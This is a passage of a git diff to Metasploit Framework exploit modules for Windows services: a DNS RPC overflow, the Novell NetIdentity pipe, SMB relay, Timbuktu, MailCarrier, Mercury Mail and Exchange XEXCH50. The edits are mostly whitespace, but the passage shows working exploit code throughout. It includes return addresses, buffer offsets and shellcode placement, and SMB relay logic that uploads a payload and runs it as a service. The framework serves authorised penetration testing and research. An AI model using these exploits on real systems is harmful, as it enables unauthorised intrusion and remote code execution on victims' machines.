dcerpc_handle('50abc2a4-574d-40b3-9d66-ee4fd5fba076', '5.0', 'ncacn_np', ['\dnsserver']) print_status("Binding to #{handle} ...") @@ -158,11 +155,11 @@ class Metasploit3 < Msf::Exploit::Remote if (target['OS'] =~ /2000/) txt[0, payload.encoded.length] = payload.encoded - + off = target['Off'] txt[ off ] = [target.ret].pack('V') txt[ off - 4, 2] = "\xeb\x06" - txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') + txt[ off + 4, 5] = "\xe9" + [ (off+9) * -1 ].pack('V') elsif (target['OS'] =~ /2003SP0/) txt[0, payload.encoded.length] = payload.encoded @@ -191,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote # 0x77f443d6 retn ; ret txt[ off + 16, 4] = [target['Rets'][2]].pack('V') # jmp esp - txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V') + txt[ off + 20, 5] = "\xe9" + [ (off+23) * -1 ].pack('V') elsif (target['OS'] =~ /2003SP12/) off = target['Off'] @@ -246,21 +243,21 @@ class Metasploit3 < Msf::Exploit::Remote txt.unpack('C*').each do |c| req << "\\" req << c.to_s(8) - end + end # Build the RPC stub data stubdata = NDR.long(rand(0xffffffff)) + NDR.wstring(Rex::Text.rand_text_alpha(1) + "\x00\x00") + - + NDR.long(rand(0xffffffff)) + NDR.string(req + "\x00") + - + NDR.long(rand(0xffffffff)) + NDR.string(Rex::Text.rand_text_alpha(1) + "\x00") - + print_status('Sending exploit...') - + begin response = dcerpc.call(1, stubdata) @@ -270,7 +267,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Exception => e print_status("Error: #{e}") end - + handler disconnect end diff --git a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb index 83a3288c17..9abfef3049 100644 --- a/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb +++ b/modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -16,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow.', 'Description' => %q{ - This module exploits a stack overflow in Novell's NetIdentity Agent. When sending + This module exploits a stack overflow in Novell's NetIdentity Agent. When sending a specially crafted string to the 'XTIERRPCPIPE' named pipe, an attacker may be able to execute arbitrary code. The success of this module is much greater once the service has been restarted. @@ -51,11 +55,11 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Apr 6 2009', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit']), - OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit']) - ], self.class ) + register_options( + [ + OptString.new('SMBUser', [ true, 'The username to authenticate as', 'metasploit']), + OptString.new('SMBPass', [ true, 'The password for the specified username', 'metasploit']) + ], self.class ) end def mem_leak @@ -134,24 +138,24 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Authenticating as user '#{datastore['SMBUser']}' with pass '#{datastore['SMBPass']}'...") - begin - smb_login() - rescue ::Exception => e - print_error("Error: #{e}") - disconnect - return - end + begin + smb_login() + rescue ::Exception => e + print_error("Error: #{e}") + disconnect + return + end - print_status("Connecting to named pipe \\XTIERRPCPIPE...") + print_status("Connecting to named pipe \\XTIERRPCPIPE...") - # If the pipe doesn't exist, bail. - begin - pipe = simple.create_pipe('\\XTIERRPCPIPE') - rescue ::Exception => e - print_error("Error: #{e}") - disconnect - return - end + # If the pipe doesn't exist, bail. + begin + pipe = simple.create_pipe('\\XTIERRPCPIPE') + rescue ::Exception => e + print_error("Error: #{e}") + disconnect + return + end # ok, set up and send our exploit buffer... fid = pipe.file_id @@ -163,4 +167,3 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end end - diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index 213615dcca..8e838f4ec7 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -19,7 +19,7 @@ under: Local Security Settings > Local Policies > Security Options > - Network Access: Sharing and security model for local accounts + Network Access: Sharing and security model for local accounts =end require 'msf/core' @@ -29,41 +29,40 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMBServer - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft Windows SMB Relay Code Execution', 'Description' => %q{ - This module will relay SMB authentication requests to another - host, gaining access to an authenticated SMB session if successful. - If the connecting user is an administrator and network logins are - allowed to the target machine, this module will execute an arbitrary - payload. To exploit this, the target system must try to authenticate - to this module. The easiest way to force a SMB authentication attempt - is by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or - email message. When the victim views the web page or email, their - system will automatically connect to the server specified in the UNC - share (the IP address of the system running this module) and attempt - to authenticate. Unfortunately, this - module is not able to clean up after itself. The service and payload - file listed in the output will need to be manually removed after access - has been gained. The service created by this tool uses a randomly chosen - name and description, so the services list can become cluttered after - repeated exploitation. + This module will relay SMB authentication requests to another + host, gaining access to an authenticated SMB session if successful. + If the connecting user is an administrator and network logins are + allowed to the target machine, this module will execute an arbitrary + payload. To exploit this, the target system must try to authenticate + to this module. The easiest way to force a SMB authentication attempt + is by embedding a UNC path (\\\\SERVER\\SHARE) into a web page or + email message. When the victim views the web page or email, their + system will automatically connect to the server specified in the UNC + share (the IP address of the system running this module) and attempt + to authenticate. Unfortunately, this + module is not able to clean up after itself. The service and payload + file listed in the output will need to be manually removed after access + has been gained. The service created by this tool uses a randomly chosen + name and description, so the services list can become cluttered after + repeated exploitation. - The SMB authentication relay attack was first reported by Sir Dystic on - March 31st, 2001 at @lanta.con in Atlanta, Georgia. - - On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin - includes a patch which prevents the relaying of challenge keys back to - the host which issued them, preventing this exploit from working in - the default configuration. It is still possible to set the SMBHOST - parameter to a third-party host that the victim is authorized to access, - but the "reflection" attack has been effectively broken. - + The SMB authentication relay attack was first reported by Sir Dystic on + March 31st, 2001 at @lanta.con in Atlanta, Georgia. + + On November 11th 2008 Microsoft released bulletin MS08-068. This bulletin + includes a patch which prevents the relaying of challenge keys back to + the host which issued them, preventing this exploit from working in + the default configuration. It is still possible to set the SMBHOST + parameter to a third-party host that the victim is authorized to access, + but the "reflection" attack has been effectively broken. }, - 'Author' => - [ + 'Author' => + [ 'hdm' ], 'License' => MSF_LICENSE, @@ -72,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread' - }, + }, 'Payload' => { 'Space' => 2048, @@ -86,26 +85,26 @@ class Metasploit3 < Msf::Exploit::Remote [ 'MSB', 'MS08-068'], [ 'URL', 'http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx'], [ 'URL', 'http://en.wikipedia.org/wiki/SMBRelay' ], - [ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ], + [ 'URL', 'http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx' ], [ 'URL', 'http://www.xfocus.net/articles/200305/smbrelay.html' ] - ], + ], 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - [ 'Automatic', { } ], + [ 'Automatic', { } ], ], 'DisclosureDate' => 'Mar 31 2001', 'DefaultTarget' => 0 )) - - register_options( - [ - OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]) - ], self.class ) + + register_options( + [ + OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]) + ], self.class ) end if (not const_defined?('NDR')) - NDR = Rex::Encoder::NDR + NDR = Rex::Encoder::NDR end def smb_haxor(c) @@ -116,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Ignoring request from #{smb[:rhost]}, attack already in progress.") return end - + if (not rclient.client.auth_user) print_line(" ") print_error( @@ -128,15 +127,15 @@ class Metasploit3 < Msf::Exploit::Remote print_line(" ") return end - + print_status("Connecting to the ADMIN$ share...") rclient.connect("ADMIN$") - + @pwned[smb[:rhost]] = true - + print_status("Regenerating the payload...") code = regenerate_payload(smb[:rsock]) - + # Upload the shellcode to a file print_status("Uploading payload...") filename = rand_text_alpha(8) + ".exe" @@ -144,19 +143,19 @@ class Metasploit3 < Msf::Exploit::Remote fd << Msf::Util::EXE.to_win32pe_service(framework,code.encoded,rand_text_alpha(8)) fd.close print_status("Created \\#{filename}...") - + # Disconnect from the ADMIN$ rclient.disconnect("ADMIN$") - + print_status("Connecting to the Service Control Manager...") rclient.connect("IPC$") dcerpc = smb_dcerpc(c, '367abb81-9844-35f1-ad32-98f038001003', '2.0', "\\svcctl") ## - # OpenSCManagerW() + # OpenSCManagerW() ## - + print_status("Obtaining a service manager handle...") scm_handle = nil stubdata = @@ -172,34 +171,34 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - + ## # CreateServiceW() ## - + servicename = rand_text_alpha(8) displayname = rand_text_alpha(rand(32)+1) svc_handle = nil svc_status = nil - + print_status("Creating a new service...") stubdata = scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - + NDR.long(0x0F01FF) + # Access: MAX NDR.long(0x00000110) + # Type: Interactive, Own process NDR.long(0x00000003) + # Start: Demand NDR.long(0x00000000) + # Errors: Ignore - + NDR.wstring("%SYSTEMROOT%\\#{filename}") + # Binary Path NDR.long(0) + # LoadOrderGroup NDR.long(0) + # Dependencies NDR.long(0) + # Service Start NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password NDR.long(0) # Password begin response = dcerpc.call(0x0c, stubdata) @@ -211,7 +210,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - + ## # CloseHandle() @@ -228,10 +227,10 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Opening service...") begin stubdata = - scm_handle + + scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) - + response = dcerpc.call(0x10, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) svc_handle = dcerpc.last_response.stub_data[0,20] @@ -240,15 +239,15 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Error: #{e}") return end - + ## # StartService() ## print_status("Starting the service...") stubdata = svc_handle + - NDR.long(0) + - NDR.long(0) + NDR.long(0) + + NDR.long(0) begin response = dcerpc.call(0x13, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) @@ -263,14 +262,14 @@ class Metasploit3 < Msf::Exploit::Remote ## print_status("Removing the service...") stubdata = - svc_handle + svc_handle begin response = dcerpc.call(0x02, stubdata) if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) end rescue ::Exception => e print_status("Error: #{e}") - end + end ## # CloseHandle() @@ -281,41 +280,41 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Exception => e print_status("Error: #{e}") end - + rclient.disconnect("IPC$") print_status("Deleting \\#{filename}...") rclient.connect("ADMIN$") rclient.delete("\\#{filename}") end - - + + def smb_dcerpc(c, uuid, version, pipe) smb = @state[c] opts = { - 'Msf' => framework, + 'Msf' => framework, 'MsfExploit' => self, 'smb_pipeio' => 'rw', 'smb_client' => smb[:rclient] } - + handle = Rex::Proto::DCERPC::Handle.new([uuid, version], 'ncacn_np', smb[:ip], [pipe]) dcerpc = Rex::Proto::DCERPC::Client.new(handle, smb[:rsock], opts) end - + def smb_cmd_dispatch(cmd, c, buff) smb = @state[c] - + @pwned ||= {} - + case cmd when CONST::SMB_COM_NEGOTIATE smb_cmd_negotiate(c, buff) when CONST::SMB_COM_SESSION_SETUP_ANDX smb_cmd_session_setup(c, buff) - + when CONST::SMB_COM_TREE_CONNECT print_status("Denying tree connect from #{smb[:name]}") pkt = CONST::SMB_BASE_PKT.make_struct @@ -324,34 +323,34 @@ class Metasploit3 < Msf::Exploit::Remote pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0xc0000022 c.put(pkt.to_s) - - else + + else print_status("Ignoring request from #{smb[:name]} (#{cmd})") pkt = CONST::SMB_BASE_PKT.make_struct pkt['Payload']['SMB'].v['Command'] = cmd pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0 # 0xc0000022 - c.put(pkt.to_s) + c.put(pkt.to_s) end - end + end def smb_cmd_negotiate(c, buff) smb = @state[c] pkt = CONST::SMB_NEG_PKT.make_struct pkt.from_s(buff) - + # Record the remote process ID smb[:process_id] = pkt['Payload']['SMB'].v['ProcessID'] group = '' machine = smb[:nbsrc] - + dialects = pkt['Payload'].v['Payload'].gsub(/\x00/, '').split(/\x02/).grep(/^\w+/) # print_status("Negotiation from #{smb[:name]}: #{dialects.join(", ")}") - - dialect = - dialects.index("NT LM 0.12") || + + dialect = + dialects.index("NT LM 0.12") || dialects.length-1 @@ -383,14 +382,14 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Error connecting to #{target_host}:#{rport} #{e.class} #{e}") end end - + if(not rsock) print_error("Could not connect to the target host (#{target_host}), the target may be firewalled.") return end - + rclient = Rex::Proto::SMB::SimpleClient.new(rsock, rport == 445 ? true : false) - + begin rclient.login_split_start_ntlm1(smb[:nbsrc]) rescue ::Interrupt @@ -399,24 +398,24 @@ class Metasploit3 < Msf::Exploit::Remote print_error("Could not negotiate NTLMv1 with #{target_host}:#{rport} #{e.class} #{e}") raise e end - + if (not rclient.client.challenge_key) print_error("No challenge key received from #{smb[:ip]}:#{rport}") rsock.close return end - + if (smb[:rsock]) - smb[:rsock].close + smb[:rsock].close end - + smb[:rsock] = rsock smb[:rclient] = rclient smb[:rhost] = target_host pkt = CONST::SMB_NEG_RES_NT_PKT.make_struct smb_set_defaults(c, pkt) - + time_hi, time_lo = UTILS.time_unix_to_smb(Time.now.to_i) pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NEGOTIATE @@ -426,57 +425,57 @@ class Metasploit3 < Msf::Exploit::Remote pkt['Payload'].v['Dialect'] = dialect pkt['Payload'].v['SecurityMode'] = 3 pkt['Payload'].v['MaxMPX'] = 2 - pkt['Payload'].v['MaxVCS'] = 1 + pkt['Payload'].v['MaxVCS'] = 1 pkt['Payload'].v['MaxBuff'] = 4356 pkt['Payload'].v['MaxRaw'] = 65536 pkt['Payload'].v['Capabilities'] = 0xe3fd # 0x80000000 for extended pkt['Payload'].v['ServerTime'] = time_lo pkt['Payload'].v['ServerDate'] = time_hi pkt['Payload'].v['Timezone'] = 0x0 - - + + pkt['Payload'].v['SessionKey'] = 0 pkt['Payload'].v['KeyLength'] = 8 - - pkt['Payload'].v['Payload'] = - rclient.client.challenge_key + + + pkt['Payload'].v['Payload'] = + rclient.client.challenge_key + Rex::Text.to_unicode(group) + "\x00\x00" + Rex::Text.to_unicode(machine) + "\x00\x00" c.put(pkt.to_s) end - + def smb_cmd_session_setup(c, buff) smb = @state[c] pkt = CONST::SMB_SETUP_NTLMV1_PKT.make_struct pkt.from_s(buff) - + # Record the remote multiplex ID smb[:multiplex_id] = pkt['Payload']['SMB'].v['MultiplexID'] - - lm_len = pkt['Payload'].v['PasswordLenLM'] - nt_len = pkt['Payload'].v['PasswordLenNT'] - + + lm_len = pkt['Payload'].v['PasswordLenLM'] + nt_len = pkt['Payload'].v['PasswordLenNT'] + lm_hash = pkt['Payload'].v['Payload'][0, lm_len].unpack("H*")[0] nt_hash = pkt['Payload'].v['Payload'][lm_len, nt_len].unpack("H*")[0] - - + + buff = pkt['Payload'].v['Payload'] buff.slice!(0, lm_len + nt_len) names = buff.split("\x00\x00").map { |x| x.gsub(/\x00/, '') } - + smb[:username] = names[0] smb[:domain] = names[1] smb[:peer_os] = names[2] smb[:peer_lm] = names[3] - - + + # Clean up the data for loggging if (smb[:username] == "") smb[:username] = nil end - + if (smb[:domain] == "") smb[:domain] = nil end @@ -486,7 +485,7 @@ class Metasploit3 < Msf::Exploit::Remote "LMHASH:#{lm_hash ? lm_hash : "<NULL>"} NTHASH:#{nt_hash ? nt_hash : "<NULL>"} " + "OS:#{smb[:peer_os]} LM:#{smb[:peer_lm]}" ) - + if (lm_hash == "" or lm_hash == "00") lm_hash = nil end @@ -494,16 +493,16 @@ class Metasploit3 < Msf::Exploit::Remote if (nt_hash == "") nt_hash = nil end - + if (lm_hash or nt_hash) rclient = smb[:rclient] print_status("Authenticating to #{smb[:rhost]} as #{smb[:domain]}\\#{smb[:username]}...") res = nil - + begin res = rclient.login_split_next_ntlm1( - smb[:username], - smb[:domain], + smb[:username], + smb[:domain], [ (lm_hash ? lm_hash : "00" * 24) ].pack("H*"), [ (nt_hash ? nt_hash : "00" * 24) ].pack("H*") ) @@ -517,9 +516,9 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Failed to authenticate as #{smb[:domain]}\\#{smb[:username]}...") end end - + print_status("Sending Access Denied to #{smb[:name]} #{smb[:domain]}\\#{smb[:username]}") - + pkt = CONST::SMB_BASE_PKT.make_struct smb_set_defaults(c, pkt) @@ -527,7 +526,7 @@ class Metasploit3 < Msf::Exploit::Remote pkt['Payload']['SMB'].v['Flags1'] = 0x88 pkt['Payload']['SMB'].v['Flags2'] = 0xc001 pkt['Payload']['SMB'].v['ErrorClass'] = 0xC0000022 - c.put(pkt.to_s) + c.put(pkt.to_s) end end diff --git a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb index e1ea143cf4..c50a258d88 100644 --- a/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb +++ b/modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -9,30 +13,30 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking - + include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow', 'Description' => %q{ - This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 - in a pretty novel way. - - This exploit requires two connections. The first connection is used to leak stack data + This module exploits a stack based buffer overflow in Timbuktu Pro version <= 8.6.6 + in a pretty novel way. + + This exploit requires two connections. The first connection is used to leak stack data using the buffer overflow to overwrite the nNumberOfBytesToWrite argument. By supplying a large value for this argument it is possible to cause Timbuktu to reply to the initial - request with leaked stack data. Using this data allows for reliable exploitation of the - buffer overflow vulnerability. - + request with leaked stack data. Using this data allows for reliable exploitation of the + buffer overflow vulnerability. + Props to Infamous41d for helping in finding this exploitation path. - - The second connection utilizes the data from the data leak to accurately exploit + + The second connection utilizes the data from the data leak to accurately exploit the stack based buffer overflow vulnerability. - - TODO: - hdm suggested using meterpreter's migration capability and restarting the process - for multishot exploitation. + + TODO: + hdm suggested using meterpreter's migration capability and restarting the process + for multishot exploitation. }, 'Author' => [ 'bannedit' ], 'License' => MSF_LICENSE, @@ -57,11 +61,11 @@ class Metasploit3 < Msf::Exploit::Remote [ # we use a memory leak technique to get the return address # tested on Windows XP SP2/SP3 may require a bit more testing - [ 'Automatic Targeting', + [ 'Automatic Targeting', { # ntdll .data (a fairly reliable address) # this address should be relatively stable across platforms/SPs - 'Writable' => 0x7C97B0B0 + 0x10 - 0xc + 'Writable' => 0x7C97B0B0 + 0x10 - 0xc } ], ], @@ -72,23 +76,23 @@ class Metasploit3 < Msf::Exploit::Remote # we make two connections this code just wraps the process - def smb_connection + def smb_connection connect() smb_login() - + print_status("Connecting to \\\\#{datastore['RHOST']}\\PlughNTCommand named pipe") - + pipe = simple.create_pipe('\\PlughNTCommand') - + fid = pipe.file_id trans2 = simple.client.trans2(0x0007, [fid, 1005].pack('vv'), '') - + return pipe end - - + + def mem_leak pipe = smb_connection() @@ -96,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Constructing memory leak...") writable_addr = target['Writable'] - + buf = make_nops(114) buf[0] = "3 " # specifies the command buf[94] = [writable_addr].pack('V') # this helps us by pass some checks in the code @@ -106,21 +110,21 @@ class Metasploit3 < Msf::Exploit::Remote pipe.write(buf) leaked = pipe.read() leaked << pipe.read() - + if (leaked.length < 0x1ff8) print_error("Error: we did not get back the expected amount of bytes. We got #{leaked.length} bytes") pipe.close disconnect - return + return end offset = 0x1d64 stackaddr = leaked[offset, 4].unpack('V')[0] bufaddr = stackaddr - 0xcc8 - + print_status "Stack address found: stack #{sprintf("0x%x", stackaddr)} buffer #{sprintf("0x%x", bufaddr)}" - + print_status("Closing connection...") pipe.close disconnect diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 510f3101ab..fa3de5d028 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -3,10 +3,10 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -14,18 +14,17 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - + include Msf::Exploit::Remote::Tcp - def initialize(info = {}) - super(update_info(info, + def initialize(info = {}) + super(update_info(info, 'Name' => 'TABS MailCarrier v2.51 SMTP EHLO Overflow', 'Description' => %q{ - This module exploits the MailCarrier v2.51 suite SMTP service. - The stack is overwritten when sending an overly long EHLO command. + This module exploits the MailCarrier v2.51 suite SMTP service. + The stack is overwritten when sending an overly long EHLO command. }, - 'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], - 'Arch' => [ ARCH_X86 ], + 'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => @@ -34,54 +33,55 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '11174' ], [ 'BID', '11535' ], [ 'URL', 'http://milw0rm.com/exploits/598' ], - ], + ], + 'Platform' => ['win'], + 'Arch' => [ ARCH_X86 ], 'Privileged' => true, 'DefaultOptions' => - { - 'EXITFUNC' => 'thread', - }, + { + 'EXITFUNC' => 'thread', + }, 'Payload' => - { + { 'Space' => 300, 'BadChars' => "\x00\x0a\x0d:", 'StackAdjustment' => -3500, }, - 'Platform' => ['win'], 'Targets' => - [ - # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en. - [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63 } ], # jmp esp expsrv.dll w2ksp0 - xpsp1 - [ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en - ], + [ + # Patrick - Tested OK 2007/08/05 : w2ksp0, w2ksp4, xpsp0, xpsp2 en. + [ 'Windows 2000 SP0 - XP SP1 - EN/FR/GR', { 'Ret' => 0x0fa14c63 } ], # jmp esp expsrv.dll w2ksp0 - xpsp1 + [ 'Windows XP SP2 - EN', { 'Ret' => 0x0fa14ccf } ], # jmp esp expsrv.dll xpsp2 en + ], 'DisclosureDate' => 'Oct 26 2004', 'DefaultTarget' => 0)) - - register_options( + + register_options( [ Opt::RPORT(25), Opt::LHOST(), # Required for stack offset ], self.class) end - def check + def check connect banner = sock.get_once(-1,3) disconnect if (banner =~ /ESMTP TABS Mail Server for Windows NT/) - return Exploit::CheckCode::Appears + return Exploit::CheckCode::Appears end - return Exploit::CheckCode::Safe + return Exploit::CheckCode::Safe end def exploit connect - + sploit = "EHLO " + rand_text_alphanumeric(5106 - datastore['LHOST'].length, payload_badchars) sploit << [target['Ret']].pack('V') + payload.encoded - + sock.put(sploit + "\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/smtp/mercury_cram_md5.rb b/modules/exploits/windows/smtp/mercury_cram_md5.rb index 9f4457f4b1..fc8d96a8ac 100644 --- a/modules/exploits/windows/smtp/mercury_cram_md5.rb +++ b/modules/exploits/windows/smtp/mercury_cram_md5.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Mercury Mail Transport System 4.51. + This module exploits a stack overflow in Mercury Mail Transport System 4.51. By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker may be able to execute arbitrary code. }, @@ -44,40 +42,40 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 600, 'BadChars' => "\x00\x0a\x0d\x20\x25", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ 'Mercury Mail Transport System 4.51', { 'Ret' => 0x258d0d1e } ], # ter32.dll + [ 'Mercury Mail Transport System 4.51', { 'Ret' => 0x258d0d1e } ], # ter32.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 18 2007')) - register_options([ Opt::RPORT(25) ], self.class) + register_options([ Opt::RPORT(25) ], self.class) end def exploit connect - sock.get_once + sock.get_once sock.put("EHLO\r\n") - sock.get_once - + sock.get_once + sock.put("AUTH CRAM-MD5\r\n") sock.get_once sleep(0.25) - - buffer = rand_text_alpha_upper(204) + [target.ret].pack('V') + + buffer = rand_text_alpha_upper(204) + [target.ret].pack('V') buffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length) - + sploit = Rex::Text.encode_base64(buffer) - - print_status("Trying target #{target.name}...") + + print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n") - + handler disconnect end diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 887fccb118..088f20f25f 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -17,20 +17,21 @@ class Metasploit3 < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow', 'Description' => %q{ - This is an exploit for the Exchange 2000 heap overflow. Due + This is an exploit for the Exchange 2000 heap overflow. Due to the nature of the vulnerability, this exploit is not very reliable. This module has been tested against Exchange 2000 SP0 and SP3 running a Windows 2000 system patched to SP4. It normally takes between one and 100 connection attempts to successfully obtain a shell. This exploit is *very* unreliable. }, - 'Author' => [ - 'hdm', # original module - 'patrick', # msf3 port :) - ], + 'Author' => + [ + 'hdm', # original module + 'patrick', # msf3 port :) + ], 'Version' => '$Revision$', 'References' => [ @@ -52,14 +53,14 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x0a\x0d\x20:=+\x22", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ [ 'Exchange 2000', { 'Ret' => 0x0c900c90, 'BuffLen' => 3000, 'Offset1' => 11000, 'Offset2' => 512 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 15 2003')) - register_options( + register_options( [ Opt::RPORT(25), OptString.new('MAILFROM', [ true, 'The FROM address of the e-mail', 'random@example.com']), @@ -67,11 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote OptInt.new('ATTEMPTS', [ true, 'The number of exploit attempts before halting', 100]), ]) end - + def check connect banner = sock.get_once - + if (banner !~ /Microsoft/) print_status("Target does not appear to be an Exchange server.") return Exploit::CheckCode::Safe @@ -85,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n") res = sock.get_once - + if (res =~ /Sender OK/) sock.put("RCPT TO: #{datastore['MAILTO']}\r\n") res = sock.get_once @@ -100,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote end end end - + disconnect end @@ -142,7 +143,7 @@ class Metasploit3 < Msf::Exploit::Remote begin if (count > datastore['ATTEMPTS']) - print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.") + print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.") return # Stop after a specified number of attempts. end @@ -214,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote end end - rescue + rescue 